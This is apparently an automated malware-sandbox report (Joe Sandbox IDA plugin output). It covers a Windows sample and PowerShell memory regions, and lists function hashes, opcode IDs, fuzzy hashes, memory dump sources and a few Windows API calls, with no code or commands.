                                                                          • Instruction Fuzzy Hash: 68F09036605568FFE712DFA4CC409DEBBA8EF05290B2580A5EC00D7216DB70EF01EBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 00405780
                                                                          • lstrcmpiA.KERNEL32(0040599F,00000000), ref: 00405798
                                                                          • CharNextA.USER32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057A9
                                                                          • lstrlenA.KERNEL32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                                          • Instruction ID: 10a66d07964700c4564cfa3c9d38ab292ebab1a3a98e0b2fc59037c9a3325cbe
                                                                          • Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                                          • Instruction Fuzzy Hash: B1F0C235605558FFD7129BA5DD4099EBBA8EF06350F2100AAF800F7211D274EE01ABA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 869e5d477f0c3feb9fe79c1c2d162694de69d3df610e2d4bf0da420de0a86c68
                                                                          • Instruction ID: bc76023fcc9634fed3628d493d603477cd756c523891305f7ac902cb0d0c7949
                                                                          • Opcode Fuzzy Hash: 869e5d477f0c3feb9fe79c1c2d162694de69d3df610e2d4bf0da420de0a86c68
                                                                          • Instruction Fuzzy Hash: F8B16070E006099FDF18CFA9D88579DBBF2AF88304F188A29E615E7254EB74AC45CF41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$4'qq$4'qq$4'qq$4'qq$84bl$84bl$tPqq$tPqq$$qq$$qq$$qq$$qq$$qq$$qq$$qq
                                                                          • API String ID: 0-2218257937
                                                                          • Opcode ID: 2073dc06c4ee84fd799d732acb3ec54b1a052726e373110958bc0364e5fd640f
                                                                          • Instruction ID: f1444bf5936a490995f4999ff2485d18220813202e637d33b928be697910c31a
                                                                          • Opcode Fuzzy Hash: 2073dc06c4ee84fd799d732acb3ec54b1a052726e373110958bc0364e5fd640f
                                                                          • Instruction Fuzzy Hash: 28729FF1B1421ADFDB148B68C441AEABBA2BF89311F14C467ED059B356CB71DC42CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (fdl$(fdl$(fdl$(fdl$4'qq$4'qq$4'qq$4'qq$tPqq$tPqq$x.Uk$-Uk
                                                                          • API String ID: 0-2021172462
                                                                          • Opcode ID: f5892030b3a725e22ff4666a1f418c0fec650d1fa9dac702afd08815b9f3754e
                                                                          • Instruction ID: 38ea0569c8509770c92fff7fcbf7ff6e34cae4fd2a67e0eb542d3f63bc253330
                                                                          • Opcode Fuzzy Hash: f5892030b3a725e22ff4666a1f418c0fec650d1fa9dac702afd08815b9f3754e
                                                                          • Instruction Fuzzy Hash: 4A72B3B0B102559FDB14CF68C851BAABBF2AF85305F14C4AAD9059F392CB71ED81CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (fdl$(fdl$4'qq$4'qq$4'qq$4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-2488139585
                                                                          • Opcode ID: 5938b0359364e4cfd9dcd91b8dae43350a6da5837682bb15189693d8b45b481a
                                                                          • Instruction ID: b381af0cc9acc52a1417af3a4391e0e7f44ebbae872b852e1f7a83080e8dce4f
                                                                          • Opcode Fuzzy Hash: 5938b0359364e4cfd9dcd91b8dae43350a6da5837682bb15189693d8b45b481a
                                                                          • Instruction Fuzzy Hash: 9AE1A1B4A102059BCB04DB68C455BAEBBF3AF88305F24C46AD9056F796CB71EC42CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$$qq$$qq$$qq
                                                                          • API String ID: 0-1584382674
                                                                          • Opcode ID: 088288b48bc006096bd21001be24a340ee7e6e0f0fcac61f33872263aad84e8d
                                                                          • Instruction ID: 70a06db8c7c1b99c2c55836e6bb4bd14c1885574805da0dcaf8e6d5a83a5b6ed
                                                                          • Opcode Fuzzy Hash: 088288b48bc006096bd21001be24a340ee7e6e0f0fcac61f33872263aad84e8d
                                                                          • Instruction Fuzzy Hash: 3D1227B97042069FCB159A7984516FBBBE2AFC6311F24C46BDD09CB362DB31D842C7A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (fdl$4'qq$4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-2271169387
                                                                          • Opcode ID: 30d2b28c4bc899b2386f8cfa204d1bc5e62a36f5810eb462cd54011611da6d2a
                                                                          • Instruction ID: ff326c6802e4d4482525447e9fbb82518bf790df84e545e46f838c86a73731d2
                                                                          • Opcode Fuzzy Hash: 30d2b28c4bc899b2386f8cfa204d1bc5e62a36f5810eb462cd54011611da6d2a
                                                                          • Instruction Fuzzy Hash: 95C19DB4A102059FDB14CB68C441BEEBBB3AF88304F25C45AE9056F796CB75E852CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$$qq$$qq$$qq
                                                                          • API String ID: 0-1584382674
                                                                          • Opcode ID: e855de0c2920f8cd853ab6bf929c4fe1f9f485dc84e52cc0a470f2f24999f184
                                                                          • Instruction ID: f28d4c3c591bbacf9dd5afc66adb1a6c53a96c5a51ad689cfcf07d3eda7e35a8
                                                                          • Opcode Fuzzy Hash: e855de0c2920f8cd853ab6bf929c4fe1f9f485dc84e52cc0a470f2f24999f184
                                                                          • Instruction Fuzzy Hash: 734101B4714216DFDB255E3488116FB7BA2AFC2311F2485ABDD45CB3A2DB31C942C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-2976610322
                                                                          • Opcode ID: 043fe56984cae79d4324745950bce7090ca7cc8c34ab419a832509895b2dc567
                                                                          • Instruction ID: ab0e46a64482f25165965ef0e373f3ce6be89a4884b282f0415bc392153cf883
                                                                          • Opcode Fuzzy Hash: 043fe56984cae79d4324745950bce7090ca7cc8c34ab419a832509895b2dc567
                                                                          • Instruction Fuzzy Hash: B71270B0B002149FDB54DB68C851BEABBB2EF85305F54C0A9D9095F391CB76AD82CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-4244907305
                                                                          • Opcode ID: 4408170944da96b92f4c6c2164efc9a47fafaee4acf8781143e49bd6512863f0
                                                                          • Instruction ID: 580a43f362f79f2a309e222cf214f82e7dbdd838cc676dccaa74cfec0fa77b40
                                                                          • Opcode Fuzzy Hash: 4408170944da96b92f4c6c2164efc9a47fafaee4acf8781143e49bd6512863f0
                                                                          • Instruction Fuzzy Hash: 6E3272B4B002559FDB10CB58C841FAABBB2EB84304F58C599D9099F392CB71ED82CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-4244907305
                                                                          • Opcode ID: eb08317405230576c6ba150bccb30004dd7074104b81b149f15b4ea310b8b03e
                                                                          • Instruction ID: 6b762c05b8e99263edae8fe4b93ff68ce61f37a98aa36980153791e95f033512
                                                                          • Opcode Fuzzy Hash: eb08317405230576c6ba150bccb30004dd7074104b81b149f15b4ea310b8b03e
                                                                          • Instruction Fuzzy Hash: D4325FB4A00255DFDB14CF58C941BAABBF2AB84304F54C59AD9099F392CB71ED82CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-4244907305
                                                                          • Opcode ID: 651616bb10fa4ec7ea63d90c6a788fabebe0b75d3dd714bc028490855598641d
                                                                          • Instruction ID: 20c3650a1d81c3d09ce227bb120c96da3d5bc46f3d3106e422637ab8c7481443
                                                                          • Opcode Fuzzy Hash: 651616bb10fa4ec7ea63d90c6a788fabebe0b75d3dd714bc028490855598641d
                                                                          • Instruction Fuzzy Hash: EA325CB4B002149FDB50DB58C851BEABBB2EF89305F54C0A5D9095F391CB76AD82CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Huq$$qq$$qq
                                                                          • API String ID: 0-880845979
                                                                          • Opcode ID: eb2b9a17dd66780a1f49cf8aed9efca6df7083309e54221d32790b6d8cc68e95
                                                                          • Instruction ID: 521969fb255d0499724b3016246e8205f838b43741a90163a701785e93ceb3e5
                                                                          • Opcode Fuzzy Hash: eb2b9a17dd66780a1f49cf8aed9efca6df7083309e54221d32790b6d8cc68e95
                                                                          • Instruction Fuzzy Hash: 5E221D30B006188FCB29DB25D8547AEBBF6BF89305F1445A9D409EB365DB35AD82CF81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-4244907305
                                                                          • Opcode ID: 0e605431b7608eb3c2e8775d12a3d0bf5e1b2db593c92ecff74e77211abe1683
                                                                          • Instruction ID: cf4191f08b046434db76780d3ca9035281a5749619064898415db4683b666771
                                                                          • Opcode Fuzzy Hash: 0e605431b7608eb3c2e8775d12a3d0bf5e1b2db593c92ecff74e77211abe1683
                                                                          • Instruction Fuzzy Hash: 390250B4B502559FDB10CB58C841FAABBB2EB84304F58C599D9099F392CB71ED82CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-4244907305
                                                                          • Opcode ID: 473c63bc3415d9c234a1bc65b2fbc16444c84d11f642324c528d2258d4c2c81d
                                                                          • Instruction ID: f9196022c2a89966042e0d77f123c927b50cf25c8943603a63d3b4d408070d21
                                                                          • Opcode Fuzzy Hash: 473c63bc3415d9c234a1bc65b2fbc16444c84d11f642324c528d2258d4c2c81d
                                                                          • Instruction Fuzzy Hash: BE026FB0B002149FDB54DB68C851BEABBB2EF89305F54C0A5D9095F391CB76AD82CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (fdl$(fdl$x.Uk
                                                                          • API String ID: 0-745258820
                                                                          • Opcode ID: ccc8b2847f8c58bbf31a745199ea282cc20bc62338010ca187ecec6ae6c05122
                                                                          • Instruction ID: 4bf4df73f53b212b8f6fa44a77af13348c48efb4acdfe8e7d1c7ef8f779cb20e
                                                                          • Opcode Fuzzy Hash: ccc8b2847f8c58bbf31a745199ea282cc20bc62338010ca187ecec6ae6c05122
                                                                          • Instruction Fuzzy Hash: 2FE16CB0B00214DFDB50DB68C891BEABBB2AF85305F54C0A5D9095F392CB76AD85CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (fdl$(fdl
                                                                          • API String ID: 0-2439184553
                                                                          • Opcode ID: f7e55401b61dca752c96b54f08cf4371f5eff985f8d029911af6d9c20b4be3a1
                                                                          • Instruction ID: c99268406945f623b210019e34b2797f001a95311fa136f6d1d97d93b1d3fa0b
                                                                          • Opcode Fuzzy Hash: f7e55401b61dca752c96b54f08cf4371f5eff985f8d029911af6d9c20b4be3a1
                                                                          • Instruction Fuzzy Hash: 861239B4A01205DFDB14CF88C541AAEFBB2AF85314F55C16AE915AF752CB72EC42CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (fdl$(fdl
                                                                          • API String ID: 0-2439184553
                                                                          • Opcode ID: 120921f071b23997b4efac0b898de7cfc0d324b59fb1c050b2981a9cba4f8150
                                                                          • Instruction ID: fa53174af3bcf1dbd85ef634e092ceaea964c0f352b6bdee0d77096e20f8f544
                                                                          • Opcode Fuzzy Hash: 120921f071b23997b4efac0b898de7cfc0d324b59fb1c050b2981a9cba4f8150
                                                                          • Instruction Fuzzy Hash: 859190B0A002059FDB14DF98C441AEEBBF2AF89705F55C46AE905AB351CB72EC41CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq
                                                                          • API String ID: 0-2334807182
                                                                          • Opcode ID: d226825f88862c61e7893df5dfbff435320a9edae552fe6688eb721dd060dd9f
                                                                          • Instruction ID: c1122c2c16cc30a13ba29dbe96eb92e11dbce53cacb8eb9e27b9f5c97240e2e7
                                                                          • Opcode Fuzzy Hash: d226825f88862c61e7893df5dfbff435320a9edae552fe6688eb721dd060dd9f
                                                                          • Instruction Fuzzy Hash: 8D3115F27142128BDF251A7854522FBB7929BC5211B64887BCD12CB383EF75C98AC397
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (fdl
                                                                          • API String ID: 0-1292725391
                                                                          • Opcode ID: 13ab1230cf6294b122242ae22f2cdf198018bef11789f57d500bb4efed9ebc18
                                                                          • Instruction ID: 571dffcb925066cab0ea4088b4db309d1945a769a175f24fd8803fbd292a35f5
                                                                          • Opcode Fuzzy Hash: 13ab1230cf6294b122242ae22f2cdf198018bef11789f57d500bb4efed9ebc18
                                                                          • Instruction Fuzzy Hash: 73916DB0A00205DFDB14DF54C041AEABBF2AF89714F56C56AE9056B352CB72EC41CF92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.Uk
                                                                          • API String ID: 0-2695900484
                                                                          • Opcode ID: 0ad59577794756bd5cb986cecc330a5cb247a3158f9b2c887730e2cb0223a493
                                                                          • Instruction ID: 996405b4238d5c708cd33f03ea07dc5a628dec1708cfc61535add53737ffb126
                                                                          • Opcode Fuzzy Hash: 0ad59577794756bd5cb986cecc330a5cb247a3158f9b2c887730e2cb0223a493
                                                                          • Instruction Fuzzy Hash: F0317EB4B50204ABD70497A8C855BBFBAA3AF84301F14C425EA016F7D1CFB6AC42CBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 63c41cbb67da2904002468d69f69efb7e9377195d453aaf0abd329485deef65e
                                                                          • Instruction ID: dee648eec52b1a6388c955a85f4745c589b475d80982f1b65e9f240a81b603eb
                                                                          • Opcode Fuzzy Hash: 63c41cbb67da2904002468d69f69efb7e9377195d453aaf0abd329485deef65e
                                                                          • Instruction Fuzzy Hash: 48E10774A00619AFDF15DF98D484AADBBF2FF88314F288659E805AB355C731ED81CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f9bef34f6f6d4e6b5890644a36cefc1297f1003dd295de8bd4f789fdaeba2ab
                                                                          • Instruction ID: 01597afe6d3c928da92c0270d1a8595fae7abbf8848657aacc39266e9bbb1940
                                                                          • Opcode Fuzzy Hash: 1f9bef34f6f6d4e6b5890644a36cefc1297f1003dd295de8bd4f789fdaeba2ab
                                                                          • Instruction Fuzzy Hash: C4C17E31A10608DFCF15DFA4C844A9DBBF2FF85304F198A69E406AB355DB75AC49CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ba8d8c018c023356dd1b8f3f56792f45daf4ba2bfc9deecc8cec9866acb4644
                                                                          • Instruction ID: c2f831588caed0c2488ffd0743146cf31816b344a3155b5a268ee5a3086e7bb8
                                                                          • Opcode Fuzzy Hash: 7ba8d8c018c023356dd1b8f3f56792f45daf4ba2bfc9deecc8cec9866acb4644
                                                                          • Instruction Fuzzy Hash: E2B16E70E006099FDF14CFA9D8857DDBBF1AF48314F188A29EA15E7264EB74A845CF81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef72a701fdc2a87ef788d7fa7038c08a4a8f78bd89c6980c04b43f75db3ce4a3
                                                                          • Instruction ID: cb4902660d7bf249f1119d48289baab9ef6e1e466ef2faaecf2dbf0e46caaff8
                                                                          • Opcode Fuzzy Hash: ef72a701fdc2a87ef788d7fa7038c08a4a8f78bd89c6980c04b43f75db3ce4a3
                                                                          • Instruction Fuzzy Hash: 16915B74A006099FCB15CF58C4949AAFBF1FF89314B288A99D815EB365C735FC51CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 548e90b92157adaf9224fb23471696e5aa0249e0e69a4e5cc9d5122f4efa896a
                                                                          • Instruction ID: 3ed000bcf15d3dd65cdf3a940cf354fcbc89c602df8e5c9a5432f9d0a5817fd1
                                                                          • Opcode Fuzzy Hash: 548e90b92157adaf9224fb23471696e5aa0249e0e69a4e5cc9d5122f4efa896a
                                                                          • Instruction Fuzzy Hash: 525146F2714302DBCB205A6988413FAFBA2AF81710F28846BDD56DB792DB35D851C762
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3671fe7d0e537f49053f13b01e4bd6541e629512fb766aaa68453b92b3ee49d2
                                                                          • Instruction ID: 9c5e9b0de2b19da3f2d43d7dda0655d851751fa73ae5b480168d165196b25b93
                                                                          • Opcode Fuzzy Hash: 3671fe7d0e537f49053f13b01e4bd6541e629512fb766aaa68453b92b3ee49d2
                                                                          • Instruction Fuzzy Hash: 25718070A00609CFCB14DF68C884A9DBBF6FF85314F288A69E416DB651DB71AC46CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e75f7bc6349ce52c8156ff8d7a3c7e39e759c20993ff161dea8e695f4c62b959
                                                                          • Instruction ID: 3a5c71381524f5a73fca4341237b76858e3fb6b6d6233f7aa7ef0a65b5bc74a9
                                                                          • Opcode Fuzzy Hash: e75f7bc6349ce52c8156ff8d7a3c7e39e759c20993ff161dea8e695f4c62b959
                                                                          • Instruction Fuzzy Hash: 85711870E10609DFDF14DFA4D884BADBBF2AF88304F248969D406AB690DB74AD46CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
